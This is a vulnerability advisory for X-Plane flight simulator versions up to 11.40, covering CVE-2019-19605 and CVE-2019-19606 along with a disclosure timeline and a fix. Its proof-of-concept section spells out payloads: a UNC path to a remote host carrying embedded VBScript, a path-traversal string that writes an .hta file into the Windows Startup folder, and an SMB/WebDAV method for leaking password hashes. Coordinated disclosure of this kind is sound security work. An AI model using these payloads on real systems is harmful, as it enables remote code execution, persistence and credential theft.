2020/03/28

X-Plane < 11.41 Remote Command Execution

BACKGROUND
X-Plane is a flight simulator produced by Laminar Research. X-Plane can be used professionally with the correct license, or used personally.

DESCRIPTION
X-Plane <= 11.40 is affected by two vulnerabilities that may allow remote users to execute arbitrary commands on systems running the simulator. Some networking interface commands, needed to interact with 3rd party apps, are not properly sanitized which allows memory corruption and path traversal/arbitrary file write. The affected interface is enabled by default and listens on port 49000 UDP. The protocol documentation is public. These vulnerabilities could be chained to execute arbitrary system commands.

PROOF OF CONCEPT

1. CVE-2019-19605 - Arbitrary Memory Write via crafted network packets, which could cause a denial of service or arbitrary code execution. 

  •     Command affected: ACFN
  •     Parameter affected: acfn_p

- The affected parameter is used as array index without range checks, allowing controlled out of bounds memory write.



2. CVE-2019-19606 - Multiple improper path validations, which could allow reading and writing files from/to arbitrary paths (or leaking OS credentials to a remote system).



  • Command affected: SIMO
  • Parameter affected: Second parameter (SIMO_path)  


  • Command affected: ACFN
  • Parameter affected: Second parameter (acfn_path_rel)    

  • Command affected: OBJN
  • Parameter affected: Second parameter (path)

  - Allows arbitrary file read/write outside of the X-Plane installation folder. Several commands do not filter correctly the data input.

   - It is also important to note that on Windows machines, when opening a file starting with "\\" or "//" followed by an ip or hostname, most IO APIs will try to connect to it as a SMB(445 port) shared folder by default, leaking the user domaingroup, username and hash password to the malicious server. If the port is closed and the WebClient service is running it will try to access the file via WEBDAV (port 80). 

    Other commands and parameters may be affected in same way.

   The "ACFN" and "SIMO" commands can be used to leak the hashed credentials and execute arbitrary command/code on every system reboot.
  • Load an aircraft from a shared folder with arbitrary VBScript code in the path, via "ACFN" command. For example: 
\\\\192.168.1.101/TMP/<script language="VBScript">CreateObject("Wscript.Shell").Run "calc.exe"</script>/final.acf
  •  Write a situation file with the "SIMO" command to the user's startup folder with ".hta" extension, gaining execution of VBScript code, stored as aircraft path inside the file. For example:
test.txt/../../../../../../../../../../../../Users/<LEAKED_USER>/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/test.hta


VIDEO
The next video shows a Kali virtual machine exploiting these vulnerabilities to execute commands (a calculator) on a machine running Windows 10 and X-Plane 11.40.



SOLUTION
Improve the parameter filtering and range checks on command parameters.


TIMELINE
November 5, 2019: Contact with X-Plane Team
November 5, 2019: X-Plane confirms the vulnerabilities.
December 6, 2019: X-Plane releases patched version 11.41r1
March 28, 2020: Advisory published.

DISCOVERED BY
Jose Antonio Pérez Piedra